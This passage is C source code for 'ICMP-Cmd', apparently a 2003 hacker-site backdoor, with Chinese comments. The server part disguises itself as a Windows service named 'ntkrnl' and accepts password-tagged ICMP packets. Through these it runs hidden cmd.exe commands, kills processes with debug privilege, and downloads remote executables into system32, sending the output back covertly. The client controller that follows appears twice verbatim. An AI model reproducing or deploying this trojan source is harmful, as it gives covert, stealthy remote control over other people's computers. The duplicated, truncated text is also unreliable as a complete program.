{
printf( " Failure ! " );
}
else
{
printf( " Failuer ... Access is Denied ! " );
}
return ;
}
schService = OpenService(schSCManager, " ntkrnl " ,SERVICE_ALL_ACCESS);
if (schService == NULL)
{
printf( " Opening Service ..... " );
dwErrorCode = GetLastError();
if (dwErrorCode == 1060 )
{
printf( " no Exists ! " );
}
else
{
printf( " Failure ! " );
}
CloseServiceHandle(schSCManager);
}
else
{
printf( " Stopping Service .... " );
if (QueryServiceStatus(schService, & RemoveServiceStatus) != 0 )
{
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " already Stopped ! " );
}
else
{
printf( " Pending ... " );
if (ControlService(schService,SERVICE_CONTROL_STOP, & RemoveServiceStatus) != 0 )
{
while (RemoveServiceStatus.dwCurrentState == SERVICE_STOP_PENDING)
{
Sleep( 10 );
QueryServiceStatus(schService, & RemoveServiceStatus);
}
if (RemoveServiceStatus.dwCurrentState == SERVICE_STOPPED)
{
printf( " Success ! " );
}
else
{
printf( " Failure ! " );
}
}
else
{
printf( " Failure ! " );
}
}
}
else
{
printf( " Query Failure ! " );
}
printf( " Removing Service .... " );
if (DeleteService(schService) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
printf( " Removing File ....... " );
Sleep( 1500 );
hSearch = FindFirstFile(lpImagePath, & FileData);
if (hSearch == INVALID_HANDLE_VALUE)
{
printf( " no Exists ! " );
}
else
{
if (DeleteFile(lpImagePath) == 0 )
{
printf( " Failure ! " );
}
else
{
printf( " Success ! " );
}
FindClose(hSearch);
}
return ;
}
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ;
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == ICMP_PASSWORD) // 密码正确则输出数据段
{
ICMP_DEST_IP = inet_ntoa(from -> sin_addr); // 取得ICMP包的源地址
memcpy(arg,buf + iphdrlen + 12 , 256 );
if ( ! memcmp(arg, " pskill " , 6 ))
{
killps(atoi(strstr(arg, " " )));
memcpy(buffer, " Process is Killed! " , sizeof ( " Process is Killed! " ));
send();
}
else if ( ! memcmp(arg, " pslist " , 6 )){pslist();send();}
else if ( ! strcmp(arg, " remove " ))
{
RemoveCmdService();
memcpy(buffer, " Service Removed! " , sizeof ( " Service Removed! " ));
send();
return ;
}
************ http下载 *************
else if ( ! memcmp(arg, " http:// " , 7 ))
{
if ( char * FileName = strstr(arg, " - " ))
{
char url[ 200 ]; // 保存网址的数组
memset(url, 0 , 200 );
memcpy(url,arg, int (FileName - arg - 1 ));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName ++ ;
strcat(fname, " / " );
strcat(fname,FileName);
* strstr(fname, " " ) = NULL;
HRESULT hRet = URLDownloadToFile( 0 ,url,fname, 0 , 0 );
memset(buffer, 0 , sizeof (buffer));
if (hRet == S_OK) memcpy(buffer, " Download OK! " , sizeof ( " Download OK " ));
else
memcpy(buffer, " Download Failure! " , sizeof ( " Download Failure! " ));
send();
return ;
}
}
// *******************************************
else {
SECURITY_ATTRIBUTES sa; // 创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if ( ! CreatePipe( & hRead, & hWrite, & sa, 0 ))
{
printf( " Error On CreatePipe() " );
return ;
}
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof (STARTUPINFO);
GetStartupInfo( & si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
char cmdline[ 270 ];
GetSystemDirectory(cmdline,MAX_PATH + 1 );
strcat(cmdline, " /cmd.exe /c " );
strcat(cmdline,arg);
if ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi))
{
printf( " Error on CreateProcess() " );
return ;
}
CloseHandle(hWrite);
DWORD bytesRead;
for (;;){
if ( ! ReadFile(hRead,buffer, 2048 , & bytesRead,NULL)) break ;
Sleep( 200 );
}
// printf("%s",buffer);
/
// 发送输出数据
send();
}
}
// else printf("Other ICMP Packets! ");
// printf(endl;
}
USHORT checksum(USHORT * buffer, int size)
{
unsigned long cksum = 0 ;
while (size > 1 )
{
cksum +=* buffer ++ ;
size -= sizeof (USHORT);
}
if (size ) {
cksum += * (UCHAR * )buffer;
}
cksum = (cksum >> 16 ) + (cksum & 0xffff );
cksum += (cksum >> 16 );
return (USHORT)( ~ cksum);
}
void fill_icmp_data( char * icmp_data)
{
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ;
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT) GetCurrentProcessId();
icmp_hdr -> i_cksum = 0 ;
icmp_hdr -> i_seq = 4321 ;
icmp_hdr -> timestamp = GetTickCount(); // 设置时间戳
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,buffer,strlen(buffer));
// for(int i=0;i<sizeof(buffer);i++) datapart[i]=buffer[i];
}
void usage( char * par)
{
printf( " =====Welcome to www.hackerxfiles.net====== " );
printf( " " );
printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- " );
printf( " ---[ E-mail: gxisone@hotmail.com ]--- " );
printf( " ---[ 2003/8/15 ]--- " );
printf( " " );
printf( " Usage: %s -install (to install service) " ,par);
printf( " %s -remove (to remove service) " ,par);
printf( " " );
return ;
}
void send( void )
{
WSADATA wsaData;
SOCKET sockRaw = (SOCKET)NULL;
struct sockaddr_in dest;
int bread,datasize,retval,bwrote;
int timeout = 1000 ;
char * icmp_data;
if ((retval = WSAStartup(MAKEWORD( 2 , 1 ), & wsaData)) != 0 ) ExitProcess(STATUS_FAILED);
if ((sockRaw = WSASocket(AF_INET,SOCK_RAW,IPPROTO_ICMP,NULL, 0 ,WSA_FLAG_OVERLAPPED))
== INVALID_SOCKET) ExitProcess(STATUS_FAILED);
__try
{
if ((bread = setsockopt(sockRaw,SOL_SOCKET,SO_SNDTIMEO,( char * ) & timeout, sizeof (timeout))) == SOCKET_ERROR) __leave;
// 设置发送超时
memset( & dest, 0 , sizeof (dest));
dest.sin_family = AF_INET;
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
datasize = strlen(buffer);
datasize += sizeof (IcmpHeader);
icmp_data = ( char * )xmalloc(MAX_PACKET);
if ( ! icmp_data) __leave;
memset(icmp_data, 0 ,MAX_PACKET);
fill_icmp_data(icmp_data); // 填充ICMP报文
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize); // 计算校验和
bwrote = sendto(sockRaw,icmp_data,datasize, 0 ,( struct sockaddr * ) & dest, sizeof (dest)); // 发送报文
if (bwrote == SOCKET_ERROR)
{
// if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out ");
// printf("sendto failed:"<<WSAGetLastError()<<endl;
__leave;
}
// printf("Send Packet to %s Success! "<<ICMP_DEST_IP<<endl;
}
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
memset(buffer, 0 , sizeof (buffer));
Sleep( 200 );
}
void pslist( void )
{
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = { 0 };
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0 );
if (hProcessSnap == (HANDLE) - 1 )
{
printf( " CreateToolhelp32Snapshot() failed:%d " ,GetLastError());
return ;
}
pe32.dwSize = sizeof (PROCESSENTRY32);
printf( " ProcessName ProcessID " );
if (Process32First(hProcessSnap, & pe32))
{
char a[ 5 ];
do
{
strcat(buffer,pe32.szExeFile);
strcat(buffer, " " );
itoa(pe32.th32ProcessID,a, 10 );
strcat(buffer,a);
strcat(buffer, " " );
// printf(" %-20s%d",pe32.szExeFile,pe32.th32ProcessID);
}
while (Process32Next(hProcessSnap, & pe32));
}
else
{
printf( " Process32Firstt() failed:%d " ,GetLastError());
}
CloseHandle (hProcessSnap);
return ;
}
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege) // 提示权限
{
TOKEN_PRIVILEGES tp;
LUID luid;
if ( ! LookupPrivilegeValue(NULL,lpszPrivilege, & luid))
{
printf( " LookupPrivilegeValue error:%d " , GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1 ;
tp.Privileges[ 0 ].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[ 0 ].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[ 0 ].Attributes = 0 ;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
& tp,
sizeof (TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf( " AdjustTokenPrivileges failed: %u " , GetLastError() );
return FALSE;
}
return TRUE;
}
/// /
BOOL killps(DWORD id) // 杀进程函数
{
HANDLE hProcess = NULL,hProcessToken = NULL;
BOOL IsKilled = FALSE,bRet = FALSE;
__try
{
if ( ! OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS, & hProcessToken))
{
printf( " Open Current Process Token failed:%d " ,GetLastError());
__leave;
}
// printf(" Open Current Process Token ok!");
if ( ! SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE))
{
__leave;
}
printf( " SetPrivilege ok! " );
if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,id)) == NULL)
{
printf( " Open Process %d failed:%d " ,id,GetLastError());
__leave;
}
// printf(" Open Process %d ok!",id);
if ( ! TerminateProcess(hProcess, 1 ))
{
printf( " TerminateProcess failed:%d " ,GetLastError());
__leave;
}
IsKilled = TRUE;
}
__finally
{
if (hProcessToken != NULL) CloseHandle(hProcessToken);
if (hProcess != NULL) CloseHandle(hProcess);
}
return (IsKilled);
}
上面代码是服务器端,client 段的代码很简单:
#include
<
winsock2.h
>
#include < stdio.h >
#include < stdlib.h >
#pragma comment(lib,"ws2_32.lib")
char SendMsg[ 256 ];
/* The IP header */
typedef struct iphdr {
unsigned int h_len: 4 ; // 4位首部长度
unsigned int version: 4 ; // IP版本号,4表示IPV4
unsigned char tos; // 8位服务类型TOS
unsigned short total_len; // 16位总长度(字节)
unsigned short ident; // 16位标识
unsigned short frag_and_flags; // 3位标志位
unsigned char ttl; // 8位生存时间 TTL
unsigned char proto; // 8位协议 (TCP, UDP 或其他)
unsigned short checksum; // 16位IP首部校验和
unsigned int sourceIP; // 32位源IP地址
unsigned int destIP; // 32位目的IP地址
}IpHeader;
typedef struct _ihdr
{
BYTE i_type; // 8位类型
BYTE i_code; // 8位代码
USHORT i_cksum; // 16位校验和
USHORT i_id; // 识别号(一般用进程号作为识别号)
USHORT i_seq; // 报文序列号
ULONG timestamp; // 时间截
} IcmpHeader;
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 2000
char arg[ 1450 ];
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data( char * , int );
USHORT checksum(USHORT * , int );
void decode_resp( char * , int , struct sockaddr_in * ); // ICMP解包函数
void help( void );
void usage( char * prog);
int main( int argc, char * argv[])
{
char * ICMP_DEST_IP; // 目标主机的IP
char * recvbuf;
if (argc != 2 )
{
usage(argv[ 0 ]);
return 0 ;
}
ICMP_DEST_IP = argv[ 1 ]; // 取得目标主机IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen = sizeof (from);
char * icmp_data;
if (WSAStartup(MAKEWORD( 2 , 2 ), & wsaData) != 0 )
{
fprintf(stderr, " WSAStartup failed: %d " , GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout = 1000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, ( char * ) & timeout, sizeof (timeout));
timeout = 4000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, ( char * ) & timeout, sizeof (timeout));
memset( & dest, 0 , sizeof (dest));
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
dest.sin_family = AF_INET;
usage(argv[ 0 ]);
__try{
for (;;){
printf( " ICMP-CMD> " );
fgets(SendMsg, 1024 ,stdin); // 取得命令行,保存在SendMsg数组中
if ( ! strcmp(SendMsg, " Q " ) ||! strcmp(SendMsg, " q " ))ExitProcess( 0 );
if ( ! strcmp(SendMsg, " " )) continue ;
if ( ! strcmp(SendMsg, " H " ) ||! strcmp(SendMsg, " h " )){help(); continue ;}
if ( ! memcmp(SendMsg, " http:// " , 7 ))
if ( ! strstr(SendMsg, " - " )){printf( " FileName Error. Use "-FileName" " ); continue ;}
datasize = strlen(SendMsg);
datasize += sizeof (IcmpHeader);
printf( " ICMP packet size is %d " ,datasize);
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET);
memset(icmp_data, 0 , MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader * )icmp_data) -> i_cksum = 0 ;
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize);
int bwrote = sendto(sockRaw, icmp_data, datasize, 0 , ( struct sockaddr * ) & dest, sizeof (dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf( " Timed out " );
fprintf(stderr, " sendto failed: %d " ,WSAGetLastError());
}
if (bwrote < datasize ) { // 没有把所有的数据发送出去,也出错了。
return 0 ;
}
printf( " Send Packet to %s Success! " ,argv[ 1 ]);
DWORD start = GetTickCount();
for (;;){
if ((GetTickCount() - start) >= 1000 ) break ;
memset(recvbuf, 0 ,MAX_PACKET);
int bread = recvfrom(sockRaw, recvbuf, MAX_PACKET, 0 , ( struct sockaddr * ) & from, & fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT)
{
printf( " timed out " );
break ;
}
fprintf(stderr, " recvfrom failed: %d " , WSAGetLastError());
break ;
}
decode_resp(recvbuf, bread, & from);
}
} // end for
} // end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
USHORT checksum(USHORT * buffer, int size)
{
unsigned long cksum = 0 ;
while (size > 1 )
{
cksum +=* buffer ++ ;
size -= sizeof (USHORT);
}
if (size)
{
cksum +=* (UCHAR * )buffer;
}
cksum = (cksum >> 16 ) + (cksum & 0xffff );
cksum += (cksum >> 16 );
return (USHORT) ( ~ cksum);
}
void fill_icmp_data( char * icmp_data, int datasize)
{
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ;
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT)GetCurrentProcessId();
icmp_hdr -> timestamp = GetTickCount();
icmp_hdr -> i_seq = 1234 ;
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,SendMsg, sizeof (SendMsg));
}
void usage( char * prog)
{
printf( " =====Welcome to www.hackerxfiles.net====== " );
printf( " " );
printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- " );
printf( " ---[ E-mail: gxisone@hotmail.com ]--- " );
printf( " ---[ 2003/8/15 ]--- " );
printf( " usage: %s RemoteIP " ,prog);
printf( " Ctrl+C or Q/q to Quite H/h for help " );
}
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
memset(arg, 0 , sizeof (arg));
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ;
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == 4321 ) // 密码正确则输出数据段
{
printf( " %d bytes from %s: " ,bytes, inet_ntoa(from -> sin_addr));
printf( " IcmpType %d " ,icmphdr -> i_type);
printf( " IcmpCode %d " ,icmphdr -> i_code);
printf( " " );
memcpy(arg,buf + iphdrlen + 12 , 1450 );
printf( " %s " ,arg);
}
else printf( " Other ICMP Packets! " );
}
void help( void )
{
printf( " " );
printf( " [http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is //system32) " );
printf( " [pslist] (List the Process) " );
printf( " [pskill ID] (Kill the Process) " );
printf( " Command (run the command) " );
printf( " " );
}
#include < stdio.h >
#include < stdlib.h >
#pragma comment(lib,"ws2_32.lib")
char SendMsg[ 256 ];
/* The IP header */
typedef struct iphdr {
unsigned int h_len: 4 ; // 4位首部长度
unsigned int version: 4 ; // IP版本号,4表示IPV4
unsigned char tos; // 8位服务类型TOS
unsigned short total_len; // 16位总长度(字节)
unsigned short ident; // 16位标识
unsigned short frag_and_flags; // 3位标志位
unsigned char ttl; // 8位生存时间 TTL
unsigned char proto; // 8位协议 (TCP, UDP 或其他)
unsigned short checksum; // 16位IP首部校验和
unsigned int sourceIP; // 32位源IP地址
unsigned int destIP; // 32位目的IP地址
}IpHeader;
typedef struct _ihdr
{
BYTE i_type; // 8位类型
BYTE i_code; // 8位代码
USHORT i_cksum; // 16位校验和
USHORT i_id; // 识别号(一般用进程号作为识别号)
USHORT i_seq; // 报文序列号
ULONG timestamp; // 时间截
} IcmpHeader;
#define STATUS_FAILED 0xFFFF
#define MAX_PACKET 2000
char arg[ 1450 ];
#define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s))
void fill_icmp_data( char * , int );
USHORT checksum(USHORT * , int );
void decode_resp( char * , int , struct sockaddr_in * ); // ICMP解包函数
void help( void );
void usage( char * prog);
int main( int argc, char * argv[])
{
char * ICMP_DEST_IP; // 目标主机的IP
char * recvbuf;
if (argc != 2 )
{
usage(argv[ 0 ]);
return 0 ;
}
ICMP_DEST_IP = argv[ 1 ]; // 取得目标主机IP
WSADATA wsaData;
SOCKET sockRaw;
struct sockaddr_in dest,from;
int datasize;
int fromlen = sizeof (from);
char * icmp_data;
if (WSAStartup(MAKEWORD( 2 , 2 ), & wsaData) != 0 )
{
fprintf(stderr, " WSAStartup failed: %d " , GetLastError());
ExitProcess(STATUS_FAILED);
}
sockRaw = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
int timeout = 1000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, ( char * ) & timeout, sizeof (timeout));
timeout = 4000 ;
setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, ( char * ) & timeout, sizeof (timeout));
memset( & dest, 0 , sizeof (dest));
dest.sin_addr.s_addr = inet_addr(ICMP_DEST_IP);
dest.sin_family = AF_INET;
usage(argv[ 0 ]);
__try{
for (;;){
printf( " ICMP-CMD> " );
fgets(SendMsg, 1024 ,stdin); // 取得命令行,保存在SendMsg数组中
if ( ! strcmp(SendMsg, " Q " ) ||! strcmp(SendMsg, " q " ))ExitProcess( 0 );
if ( ! strcmp(SendMsg, " " )) continue ;
if ( ! strcmp(SendMsg, " H " ) ||! strcmp(SendMsg, " h " )){help(); continue ;}
if ( ! memcmp(SendMsg, " http:// " , 7 ))
if ( ! strstr(SendMsg, " - " )){printf( " FileName Error. Use "-FileName" " ); continue ;}
datasize = strlen(SendMsg);
datasize += sizeof (IcmpHeader);
printf( " ICMP packet size is %d " ,datasize);
icmp_data = ( char * )xmalloc(MAX_PACKET);
recvbuf = ( char * )xmalloc(MAX_PACKET);
memset(icmp_data, 0 , MAX_PACKET);
fill_icmp_data(icmp_data, datasize);
((IcmpHeader * )icmp_data) -> i_cksum = 0 ;
((IcmpHeader * )icmp_data) -> i_cksum = checksum((USHORT * )icmp_data, datasize);
int bwrote = sendto(sockRaw, icmp_data, datasize, 0 , ( struct sockaddr * ) & dest, sizeof (dest));
if (bwrote == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT) printf( " Timed out " );
fprintf(stderr, " sendto failed: %d " ,WSAGetLastError());
}
if (bwrote < datasize ) { // 没有把所有的数据发送出去,也出错了。
return 0 ;
}
printf( " Send Packet to %s Success! " ,argv[ 1 ]);
DWORD start = GetTickCount();
for (;;){
if ((GetTickCount() - start) >= 1000 ) break ;
memset(recvbuf, 0 ,MAX_PACKET);
int bread = recvfrom(sockRaw, recvbuf, MAX_PACKET, 0 , ( struct sockaddr * ) & from, & fromlen);
if (bread == SOCKET_ERROR)
{
if (WSAGetLastError() == WSAETIMEDOUT)
{
printf( " timed out " );
break ;
}
fprintf(stderr, " recvfrom failed: %d " , WSAGetLastError());
break ;
}
decode_resp(recvbuf, bread, & from);
}
} // end for
} // end try
__finally
{
if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
WSACleanup();
}
return 0 ;
}
USHORT checksum(USHORT * buffer, int size)
{
unsigned long cksum = 0 ;
while (size > 1 )
{
cksum +=* buffer ++ ;
size -= sizeof (USHORT);
}
if (size)
{
cksum +=* (UCHAR * )buffer;
}
cksum = (cksum >> 16 ) + (cksum & 0xffff );
cksum += (cksum >> 16 );
return (USHORT) ( ~ cksum);
}
void fill_icmp_data( char * icmp_data, int datasize)
{
IcmpHeader * icmp_hdr;
char * datapart;
icmp_hdr = (IcmpHeader * )icmp_data;
icmp_hdr -> i_type = 0 ;
icmp_hdr -> i_code = 0 ;
icmp_hdr -> i_id = (USHORT)GetCurrentProcessId();
icmp_hdr -> timestamp = GetTickCount();
icmp_hdr -> i_seq = 1234 ;
datapart = icmp_data + sizeof (IcmpHeader);
memcpy(datapart,SendMsg, sizeof (SendMsg));
}
void usage( char * prog)
{
printf( " =====Welcome to www.hackerxfiles.net====== " );
printf( " " );
printf( " ---[ ICMP-Cmd v1.0 beta, by gxisone ]--- " );
printf( " ---[ E-mail: gxisone@hotmail.com ]--- " );
printf( " ---[ 2003/8/15 ]--- " );
printf( " usage: %s RemoteIP " ,prog);
printf( " Ctrl+C or Q/q to Quite H/h for help " );
}
void decode_resp( char * buf, int bytes, struct sockaddr_in * from)
{
memset(arg, 0 , sizeof (arg));
IpHeader * iphdr;
IcmpHeader * icmphdr;
unsigned short iphdrlen;
iphdr = (IpHeader * )buf;
iphdrlen = iphdr -> h_len * 4 ;
icmphdr = (IcmpHeader * )(buf + iphdrlen);
if (icmphdr -> i_seq == 4321 ) // 密码正确则输出数据段
{
printf( " %d bytes from %s: " ,bytes, inet_ntoa(from -> sin_addr));
printf( " IcmpType %d " ,icmphdr -> i_type);
printf( " IcmpCode %d " ,icmphdr -> i_code);
printf( " " );
memcpy(arg,buf + iphdrlen + 12 , 1450 );
printf( " %s " ,arg);
}
else printf( " Other ICMP Packets! " );
}
void help( void )
{
printf( " " );
printf( " [http://127.0.0.1/hack.exe -admin.exe] (Download Files. Parth is //system32) " );
printf( " [pslist] (List the Process) " );
printf( " [pskill ID] (Kill the Process) " );
printf( " Command (run the command) " );
printf( " " );
}